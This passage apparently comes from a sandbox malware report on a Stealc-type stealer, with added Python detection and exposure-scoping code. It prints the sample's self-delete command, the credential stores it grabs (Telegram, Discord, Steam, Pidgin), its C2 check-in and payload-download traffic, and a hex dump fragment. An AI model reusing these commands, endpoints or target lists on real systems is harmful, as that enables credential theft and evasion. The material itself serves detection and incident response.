                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02C76337 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,1_2_02C76337
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02C79DE7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,1_2_02C79DE7
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02C7EDE7 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,1_2_02C7EDE7
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02C79D87 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_02C79D87
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02C779B7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_02C779B7
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02C86D07 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,strtok_s,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,strtok_s,lstrlen,lstrcpy,memset,1_2_02C86D07
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02C94527 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,1_2_02C94527
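The decrypted strings above contain two things a detection engineer can act on: the cleanup command the sample runs through C:\Windows\system32\cmd.exe ("/c timeout /t 5 & del /f /q "<path>" & del "C:\ProgramData\*.dll"" & exit") and the names of the NSS/SQLite helper DLLs it needs to read browser credential stores (freebl3.dll, mozglue.dll, msvcp140.dll, nss3.dll, softokn3.dll, vcruntime140.dll, sqlite3.dll). The following Python is an added detection example written for this page, not code from the report or from Joe Sandbox. The Sysmon-style events it runs over are constructed; that the helper DLLs are written to C:\ProgramData is inferred from the cleanup command, not stated in the report.

```python
import re
from dataclasses import dataclass

# Helper DLL names the sample decrypts at runtime. Keying on C:\ProgramData is an
# inference from the decrypted cleanup command (del "C:\ProgramData\*.dll").
HELPER_DLLS = {"freebl3.dll", "mozglue.dll", "msvcp140.dll", "nss3.dll",
               "softokn3.dll", "vcruntime140.dll", "sqlite3.dll"}

# Matches the decrypted cleanup command:
#   /c timeout /t 5 & del /f /q "<self>" & del "C:\ProgramData\*.dll"
SELF_DELETE = re.compile(
    r'/c\s+timeout\s+/t\s+\d+\s*&\s*del\s+/f\s+/q\s+"(?P<target>[^"]+)"'
    r'\s*&\s*del\s+"C:\\ProgramData\\\*\.dll"',
    re.IGNORECASE,
)

# Constructed Sysmon-style events (EventID 1 = process create, 11 = file create):
# synthetic records shaped after the decrypted strings, not events from the sandbox run.
SAMPLE_EVENTS = [
    {"EventID": 11, "Image": r"C:\Users\user\AppData\Local\Temp\ED60.tmp.exe",
     "TargetFilename": r"C:\ProgramData\nss3.dll"},
    {"EventID": 11, "Image": r"C:\Users\user\AppData\Local\Temp\ED60.tmp.exe",
     "TargetFilename": r"C:\ProgramData\sqlite3.dll"},
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\ED60.tmp.exe",
     "CommandLine": r'"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q '
                    r'"C:\Users\user\AppData\Local\Temp\ED60.tmp.exe" & del "C:\ProgramData\*.dll"" & exit'},
    # Benign look-alikes: a timeout without the delete chain, and nss3.dll written by a browser installer.
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c timeout /t 5 & echo done"},
    {"EventID": 11, "Image": r"C:\Users\user\Downloads\Firefox Setup.exe",
     "TargetFilename": r"C:\Program Files\Mozilla Firefox\nss3.dll"},
]


@dataclass
class Alert:
    rule: str
    image: str
    detail: str


def check_self_delete(ev: dict):
    """cmd.exe spawned to wait, delete a file and wipe C:\\ProgramData\\*.dll."""
    if ev.get("EventID") != 1:
        return None
    m = SELF_DELETE.search(ev.get("CommandLine", ""))
    if not m:
        return None
    target = m.group("target")
    # Strongest form: the file being deleted is the parent that spawned cmd.exe.
    parent = ev.get("ParentImage", "")
    kind = "parent deletes itself" if parent.lower() == target.lower() else "delete chain"
    return Alert("stealc_self_delete", ev.get("Image", ""), f"{kind}: {target}")


def check_helper_dll_drop(ev: dict):
    """One of the NSS/SQLite helper DLLs written directly under C:\\ProgramData."""
    if ev.get("EventID") != 11:
        return None
    path = ev.get("TargetFilename", "")
    folder, _, name = path.rpartition("\\")
    if name.lower() in HELPER_DLLS and folder.lower() == r"c:\programdata":
        return Alert("stealc_helper_dll_drop", ev.get("Image", ""), path)
    return None


def triage(events):
    alerts = []
    for ev in events:
        for check in (check_self_delete, check_helper_dll_drop):
            alert = check(ev)
            if alert:
                alerts.append(alert)
    # Escalate when one process stages two or more of the helper DLLs: that is the
    # browser-credential parsing setup, not a stray file write.
    staged = {}
    for a in alerts:
        if a.rule == "stealc_helper_dll_drop":
            staged.setdefault(a.image, set()).add(a.detail.rpartition("\\")[2].lower())
    for image, dlls in staged.items():
        if len(dlls) >= 2:
            alerts.append(Alert("stealc_credential_staging", image, ", ".join(sorted(dlls))))
    return alerts


if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS):
        print(f"{a.rule:28} {a.image}  {a.detail}")
```

The self-delete rule requires both halves of the chain (the quoted target and the ProgramData wildcard delete) so that ordinary "timeout & del" maintenance scripts do not fire it; the DLL rule only escalates once the same writer has staged more than one of the listed libraries.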

                  Compliance

                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Unpacked PE file: 0.2.6X4BIzTTBR.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Unpacked PE file: 1.2.ED60.tmp.exe.400000.0.unpack
                  Source: 6X4BIzTTBR.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
                  Source: unknown | HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02C84ED7 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02C84ED7
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02C84EF0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_02C84EF0
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02C8E657 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_02C8E657
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02C81607 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02C81607
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02C81620 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02C81620
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02C83CD7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02C83CD7
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02C81C57 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_02C81C57
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02C8D037 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_02C8D037
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02C7DDE7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02C7DDE7
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02C8D987 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02C8D987
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02C8E187 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,1_2_02C8E187
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02C71907 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_02C71907
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02C71920 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_02C71920
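The FindFirstFileA/CopyFileA/DeleteFileA loops listed above are the file grabber, and the directory markers and filename globs it applies are the decrypted strings earlier in the report (\Telegram Desktop\ with key_datas, map*, D877F783D5D3EF8C* and the other tdata prefixes; \discord\ with \Local Storage\leveldb; \Steam\ with \config\, ssfn*, config.vdf and loginusers.vdf; *.tox; \.purple\ with accounts.xml; %RECENT% with *.lnk). For incident scoping the question is which files on a given host matched those patterns. The Python below is an added example written for this page, not code from the report: it applies the recovered markers and globs to a constructed file listing. The \Recent\ folder used for the %RECENT% placeholder is an assumption; the report does not say which path the placeholder resolves to.

```python
import fnmatch

# Artifact stores the grabber enumerates: directory markers it looks for and the
# filename globs it copies, both taken from the decrypted strings. The "\Recent\"
# marker is an assumption for the %RECENT% placeholder.
STORES = {
    "Telegram Desktop": (["\\Telegram Desktop\\"],
                         ["key_datas", "map*", "D877F783D5D3EF8C*", "A7FDF864FBC10B77*",
                          "A92DAA6EA6F891F2*", "F8806DD0C461824F*"]),
    "Discord":          (["\\discord\\", "\\Local Storage\\leveldb"], ["*"]),
    "Steam":            (["\\Steam\\", "\\config\\"],
                         ["ssfn*", "config.vdf", "DialogConfig.vdf", "DialogConfigOverlay*.vdf",
                          "libraryfolders.vdf", "loginusers.vdf"]),
    "Tox":              ([], ["*.tox"]),
    "Pidgin":           (["\\.purple\\"], ["accounts.xml"]),
    "Recent shortcuts": (["\\Recent\\"], ["*.lnk"]),
}

# Constructed file listing standing in for a triaged host; not from the sandbox run.
SAMPLE_LISTING = [
    r"C:\Users\user\AppData\Roaming\Telegram Desktop\tdata\key_datas",
    r"C:\Users\user\AppData\Roaming\Telegram Desktop\tdata\D877F783D5D3EF8C0",
    r"C:\Users\user\AppData\Roaming\Telegram Desktop\tdata\D877F783D5D3EF8C\maps",
    r"C:\Users\user\AppData\Roaming\Telegram Desktop\tdata\settingss",
    r"C:\Users\user\AppData\Roaming\discord\Local Storage\leveldb\000005.ldb",
    r"C:\Users\user\AppData\Roaming\discord\Cache\data_0",
    r"C:\Program Files (x86)\Steam\config\loginusers.vdf",
    r"C:\Program Files (x86)\Steam\config\ssfn1234567890123456",
    r"C:\Program Files (x86)\Steam\steam.exe",
    r"C:\Users\user\AppData\Roaming\Tox\profile.tox",
    r"C:\Users\user\AppData\Roaming\.purple\accounts.xml",
    r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\budget.xlsx.lnk",
    r"C:\Users\user\Documents\budget.xlsx",
]


def match_store(path: str):
    """Name of the store a file belongs to, or None if the grabber would skip it.
    Every marker of the store must appear in the path and the file name must match a glob."""
    low = path.lower()
    name = low.rpartition("\\")[2]
    for store, (markers, globs) in STORES.items():
        if all(m.lower() in low for m in markers) and \
                any(fnmatch.fnmatchcase(name, g.lower()) for g in globs):
            return store
    return None


def exposure(paths):
    """Group a host's file listing by the store the grabber would have copied it from."""
    hit = {}
    for p in paths:
        store = match_store(p)
        if store:
            hit.setdefault(store, []).append(p)
    return hit


if __name__ == "__main__":
    for store, files in exposure(SAMPLE_LISTING).items():
        print(store)
        for f in files:
            print("   ", f)
```

Matching is case-insensitive on both the markers and the globs because the sample compares with StrCmpCA and PathMatchSpecA, both of which ignore case; a listing entry only counts once all of a store's markers are present, which is what keeps discord\Cache or Steam\steam.exe out of the result.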

                  Networking

                  Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49738 -> 92.255.57.88:80
                  Source: Malware configuration extractor | URLs: http://92.255.57.88/7bbacc20a3bd2eb5.php
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 26 Nov 2024 21:47:11 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Tue, 26 Nov 2024 21:45:02 GMTETag: "45e00-627d7c2f13cde"Accept-Ranges: bytesContent-Length: 286208Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ec 1a 10 d8 a8 7b 7e 8b a8 7b 7e 8b a8 7b 7e 8b 15 34 e8 8b aa 7b 7e 8b b6 29 fa 8b b5 7b 7e 8b b6 29 eb 8b b2 7b 7e 8b b6 29 fd 8b de 7b 7e 8b 8f bd 05 8b af 7b 7e 8b a8 7b 7f 8b d3 7b 7e 8b b6 29 f4 8b a9 7b 7e 8b b6 29 ea 8b a9 7b 7e 8b b6 29 ef 8b a9 7b 7e 8b 52 69 63 68 a8 7b 7e 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 07 90 09 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 26 03 00 00 64 65 02 00 00 00 00 06 19 00 00 00 10 00 00 00 40 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 68 02 00 04 00 00 e3 e4 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 9c 59 03 00 50 00 00 00 00 b0 67 02 c0 b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 03 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5b 25 03 00 00 10 00 00 00 26 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 23 00 00 00 40 03 00 00 24 00 00 00 2a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 
40 00 00 40 2e 64 61 74 61 00 00 00 dc e2 63 02 00 70 03 00 00 1c 00 00 00 4e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 78 75 78 6f 7a 00 00 48 49 00 00 00 60 67 02 00 3e 00 00 00 6a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c0 b5 00 00 00 b0 67 02 00 b6 00 00 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                  Source: global traffic | HTTP traffic detected:
                      GET / HTTP/1.1
                      Host: 92.255.57.88
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected:
                      POST /7bbacc20a3bd2eb5.php HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----IJKFHDBKFCAAECBFIDHJ
                      Host: 92.255.57.88
                      Content-Length: 216
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 30 32 46 43 31 36 35 32 39 30 36 31 34 33 37 37 38 38 36 35 34 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 35 35 31 34 38 38 34 31 31 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 2d 2d 0d 0a
                      Data Ascii (CRLF line breaks restored from the raw bytes):
                          ------IJKFHDBKFCAAECBFIDHJ
                          Content-Disposition: form-data; name="hwid"

                          102FC16529061437788654
                          ------IJKFHDBKFCAAECBFIDHJ
                          Content-Disposition: form-data; name="build"

                          551488411
                          ------IJKFHDBKFCAAECBFIDHJ--
                  Source: Joe Sandbox View | IP Address: 176.113.115.37
                  Source: Joe Sandbox View | IP Address: 172.67.179.207
                  Source: Joe Sandbox View | ASN Name: TELSPRU
                  Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 176.113.115.37:80
                  Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 172.67.179.207:443
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.113.115.37 (this finding is listed 50 times in the report, once per connection)
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: 0_2_00402A05 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
                  Source: global traffic | HTTP traffic detected:
                      GET /track_prt.php?sub=0&cc=DE HTTP/1.1
                      User-Agent: ShareScreen
                      Host: post-to-me.com
                  Source: global traffic | HTTP traffic detected:
                      GET /ScreenUpdateSync.exe HTTP/1.1
                      User-Agent: ShareScreen
                      Host: 176.113.115.37
                  Source: global traffic | HTTP traffic detected:
                      GET / HTTP/1.1
                      Host: 92.255.57.88
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                  Source: global traffic | DNS traffic detected: DNS query: post-to-me.com
                  Source: unknown | HTTP traffic detected:
                      POST /7bbacc20a3bd2eb5.php HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----IJKFHDBKFCAAECBFIDHJ
                      Host: 92.255.57.88
                      Content-Length: 216
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 30 32 46 43 31 36 35 32 39 30 36 31 34 33 37 37 38 38 36 35 34 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 35 35 31 34 38 38 34 31 31 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 2d 2d 0d 0a
                      Data Ascii:
                      ------IJKFHDBKFCAAECBFIDHJ
                      Content-Disposition: form-data; name="hwid"

                      102FC16529061437788654
